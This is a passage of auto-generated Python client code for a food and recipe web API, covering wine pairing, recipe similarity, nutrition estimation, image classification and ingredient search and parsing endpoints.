header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/shopping-list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_similar_recipes(self, id, **kwargs): # noqa: E501
"""Get Similar Recipes # noqa: E501
Find recipes which are similar to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_recipes(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the source recipe for which similar recipes should be found. (required)
:param float number: The number of random recipes to be returned (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_similar_recipes_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_similar_recipes_with_http_info(id, **kwargs) # noqa: E501
return data
def get_similar_recipes_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Similar Recipes # noqa: E501
Find recipes which are similar to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_recipes_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the source recipe for which similar recipes should be found. (required)
:param float number: The number of random recipes to be returned (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'number', 'limit_license'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_similar_recipes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_similar_recipes`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/similar', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_description(self, wine, **kwargs): # noqa: E501
"""Get Wine Description # noqa: E501
Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_description(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The name of the wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_description_with_http_info(wine, **kwargs) # noqa: E501
else:
(data) = self.get_wine_description_with_http_info(wine, **kwargs) # noqa: E501
return data
def get_wine_description_with_http_info(self, wine, **kwargs): # noqa: E501
"""Get Wine Description # noqa: E501
Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_description_with_http_info(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The name of the wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['wine'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_description" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'wine' is set
if ('wine' not in local_var_params or
local_var_params['wine'] is None):
raise ApiValueError("Missing the required parameter `wine` when calling `get_wine_description`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'wine' in local_var_params:
query_params.append(('wine', local_var_params['wine'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/description', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_pairing(self, food, **kwargs): # noqa: E501
"""Get Wine Pairing # noqa: E501
Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\"). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_pairing(food, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str food: The food to get a pairing for. This can be a dish (\"steak\"), an ingredient (\"salmon\"), or a cuisine (\"italian\"). (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_pairing_with_http_info(food, **kwargs) # noqa: E501
else:
(data) = self.get_wine_pairing_with_http_info(food, **kwargs) # noqa: E501
return data
def get_wine_pairing_with_http_info(self, food, **kwargs): # noqa: E501
"""Get Wine Pairing # noqa: E501
Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\"). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_pairing_with_http_info(food, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str food: The food to get a pairing for. This can be a dish (\"steak\"), an ingredient (\"salmon\"), or a cuisine (\"italian\"). (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['food', 'max_price'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_pairing" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'food' is set
if ('food' not in local_var_params or
local_var_params['food'] is None):
raise ApiValueError("Missing the required parameter `food` when calling `get_wine_pairing`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'food' in local_var_params:
query_params.append(('food', local_var_params['food'])) # noqa: E501
if 'max_price' in local_var_params:
query_params.append(('maxPrice', local_var_params['max_price'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/pairing', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_recommendation(self, wine, **kwargs): # noqa: E501
"""Get Wine Recommendation # noqa: E501
Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_recommendation(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine to get a specific product recommendation for. (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:param float min_rating: The minimum rating of the recommended wine between 0 and 1. For example, 0.8 equals 4 out of 5 stars.
:param float number: The number of wine recommendations expected (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_recommendation_with_http_info(wine, **kwargs) # noqa: E501
else:
(data) = self.get_wine_recommendation_with_http_info(wine, **kwargs) # noqa: E501
return data
def get_wine_recommendation_with_http_info(self, wine, **kwargs): # noqa: E501
"""Get Wine Recommendation # noqa: E501
Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_recommendation_with_http_info(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine to get a specific product recommendation for. (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:param float min_rating: The minimum rating of the recommended wine between 0 and 1. For example, 0.8 equals 4 out of 5 stars.
:param float number: The number of wine recommendations expected (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['wine', 'max_price', 'min_rating', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_recommendation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'wine' is set
if ('wine' not in local_var_params or
local_var_params['wine'] is None):
raise ApiValueError("Missing the required parameter `wine` when calling `get_wine_recommendation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'wine' in local_var_params:
query_params.append(('wine', local_var_params['wine'])) # noqa: E501
if 'max_price' in local_var_params:
query_params.append(('maxPrice', local_var_params['max_price'])) # noqa: E501
if 'min_rating' in local_var_params:
query_params.append(('minRating', local_var_params['min_rating'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/recommendation', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def guess_nutrition_by_dish_name(self, title, **kwargs): # noqa: E501
"""Guess Nutrition by Dish Name # noqa: E501
Estimate the macronutrients of a dish based on its title. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.guess_nutrition_by_dish_name(title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the dish. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.guess_nutrition_by_dish_name_with_http_info(title, **kwargs) # noqa: E501
else:
(data) = self.guess_nutrition_by_dish_name_with_http_info(title, **kwargs) # noqa: E501
return data
def guess_nutrition_by_dish_name_with_http_info(self, title, **kwargs): # noqa: E501
"""Guess Nutrition by Dish Name # noqa: E501
Estimate the macronutrients of a dish based on its title. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.guess_nutrition_by_dish_name_with_http_info(title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the dish. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['title'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method guess_nutrition_by_dish_name" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'title' is set
if ('title' not in local_var_params or
local_var_params['title'] is None):
raise ApiValueError("Missing the required parameter `title` when calling `guess_nutrition_by_dish_name`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'title' in local_var_params:
query_params.append(('title', local_var_params['title'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/guessNutrition', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def image_analysis_by_url(self, image_url, **kwargs): # noqa: E501
"""Image Analysis by URL # noqa: E501
Analyze a food image. The API tries to classify the image, guess the nutrition, and find a matching recipes. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_analysis_by_url(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.image_analysis_by_url_with_http_info(image_url, **kwargs) # noqa: E501
else:
(data) = self.image_analysis_by_url_with_http_info(image_url, **kwargs) # noqa: E501
return data
def image_analysis_by_url_with_http_info(self, image_url, **kwargs): # noqa: E501
"""Image Analysis by URL # noqa: E501
Analyze a food image. The API tries to classify the image, guess the nutrition, and find a matching recipes. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_analysis_by_url_with_http_info(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['image_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method image_analysis_by_url" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'image_url' is set
if ('image_url' not in local_var_params or
local_var_params['image_url'] is None):
raise ApiValueError("Missing the required parameter `image_url` when calling `image_analysis_by_url`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'image_url' in local_var_params:
query_params.append(('imageUrl', local_var_params['image_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/images/analyze', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def image_classification_by_url(self, image_url, **kwargs): # noqa: E501
"""Image Classification by URL # noqa: E501
Classify a food image. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_classification_by_url(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be classified. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.image_classification_by_url_with_http_info(image_url, **kwargs) # noqa: E501
else:
(data) = self.image_classification_by_url_with_http_info(image_url, **kwargs) # noqa: E501
return data
def image_classification_by_url_with_http_info(self, image_url, **kwargs): # noqa: E501
"""Image Classification by URL # noqa: E501
Classify a food image. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_classification_by_url_with_http_info(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be classified. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['image_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method image_classification_by_url" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'image_url' is set
if ('image_url' not in local_var_params or
local_var_params['image_url'] is None):
raise ApiValueError("Missing the required parameter `image_url` when calling `image_classification_by_url`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'image_url' in local_var_params:
query_params.append(('imageUrl', local_var_params['image_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/images/classify', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def ingredient_search(self, query, **kwargs): # noqa: E501
"""Ingredient Search # noqa: E501
Search for simple whole foods (e.g. fruits, vegetables, nuts, grains, meat, fish, dairy etc.). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ingredient_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The partial or full ingredient name. (required)
:param bool add_children: Whether to add children of found foods.
:param float min_protein_percent: The minimum percentage of protein the food must have (between 0 and 100).
:param float max_protein_percent: The maximum percentage of protein the food can have (between 0 and 100).
:param float min_fat_percent: The minimum percentage of fat the food must have (between 0 and 100).
:param float max_fat_percent: The maximum percentage of fat the food can have (between 0 and 100).
:param float min_carbs_percent: The minimum percentage of carbs the food must have (between 0 and 100).
:param float max_carbs_percent: The maximum percentage of carbs the food can have (between 0 and 100).
:param bool meta_information: Whether to return more meta information about the ingredients.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
:param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.ingredient_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.ingredient_search_with_http_info(query, **kwargs) # noqa: E501
return data
def ingredient_search_with_http_info(self, query, **kwargs): # noqa: E501
"""Ingredient Search # noqa: E501
Search for simple whole foods (e.g. fruits, vegetables, nuts, grains, meat, fish, dairy etc.). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ingredient_search_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The partial or full ingredient name. (required)
:param bool add_children: Whether to add children of found foods.
:param float min_protein_percent: The minimum percentage of protein the food must have (between 0 and 100).
:param float max_protein_percent: The maximum percentage of protein the food can have (between 0 and 100).
:param float min_fat_percent: The minimum percentage of fat the food must have (between 0 and 100).
:param float max_fat_percent: The maximum percentage of fat the food can have (between 0 and 100).
:param float min_carbs_percent: The minimum percentage of carbs the food must have (between 0 and 100).
:param float max_carbs_percent: The maximum percentage of carbs the food can have (between 0 and 100).
:param bool meta_information: Whether to return more meta information about the ingredients.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
:param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'add_children', 'min_protein_percent', 'max_protein_percent', 'min_fat_percent', 'max_fat_percent', 'min_carbs_percent', 'max_carbs_percent', 'meta_information', 'intolerances', 'sort', 'sort_direction', 'offset', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method ingredient_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `ingredient_search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'add_children' in local_var_params:
query_params.append(('addChildren', local_var_params['add_children'])) # noqa: E501
if 'min_protein_percent' in local_var_params:
query_params.append(('minProteinPercent', local_var_params['min_protein_percent'])) # noqa: E501
if 'max_protein_percent' in local_var_params:
query_params.append(('maxProteinPercent', local_var_params['max_protein_percent'])) # noqa: E501
if 'min_fat_percent' in local_var_params:
query_params.append(('minFatPercent', local_var_params['min_fat_percent'])) # noqa: E501
if 'max_fat_percent' in local_var_params:
query_params.append(('maxFatPercent', local_var_params['max_fat_percent'])) # noqa: E501
if 'min_carbs_percent' in local_var_params:
query_params.append(('minCarbsPercent', local_var_params['min_carbs_percent'])) # noqa: E501
if 'max_carbs_percent' in local_var_params:
query_params.append(('maxCarbsPercent', local_var_params['max_carbs_percent'])) # noqa: E501
if 'meta_information' in local_var_params:
query_params.append(('metaInformation', local_var_params['meta_information'])) # noqa: E501
if 'intolerances' in local_var_params:
query_params.append(('intolerances', local_var_params['intolerances'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sort_direction' in local_var_params:
query_params.append(('sortDirection', local_var_params['sort_direction'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def map_ingredients_to_grocery_products(self, body, **kwargs): # noqa: E501
"""Map Ingredients to Grocery Products # noqa: E501
Map a set of ingredients to products you can buy in the grocery store. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.map_ingredients_to_grocery_products(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.map_ingredients_to_grocery_products_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.map_ingredients_to_grocery_products_with_http_info(body, **kwargs) # noqa: E501
return data
def map_ingredients_to_grocery_products_with_http_info(self, body, **kwargs): # noqa: E501
"""Map Ingredients to Grocery Products # noqa: E501
Map a set of ingredients to products you can buy in the grocery store. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.map_ingredients_to_grocery_products_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method map_ingredients_to_grocery_products" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ApiValueError("Missing the required parameter `body` when calling `map_ingredients_to_grocery_products`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/map', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def parse_ingredients(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Parse Ingredients # noqa: E501
Extract an ingredient from plain text. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.parse_ingredients(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings that you can make from the ingredients. (required)
:param bool include_nutrition: Whether nutrition data should be added to correctly parsed ingredients.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.parse_ingredients_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
else:
(data) = self.parse_ingredients_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
return data
def parse_ingredients_with_http_info(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Parse Ingredients # noqa: E501
Extract an ingredient from plain text. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.parse_ingredients_with_http_info(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings that you can make from the ingredients. (required)
:param bool include_nutrition: Whether nutrition data should be added to correctly parsed ingredients.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_list', 'servings', 'include_nutrition'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method parse_ingredients" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `parse_ingredients`") # noqa: E501
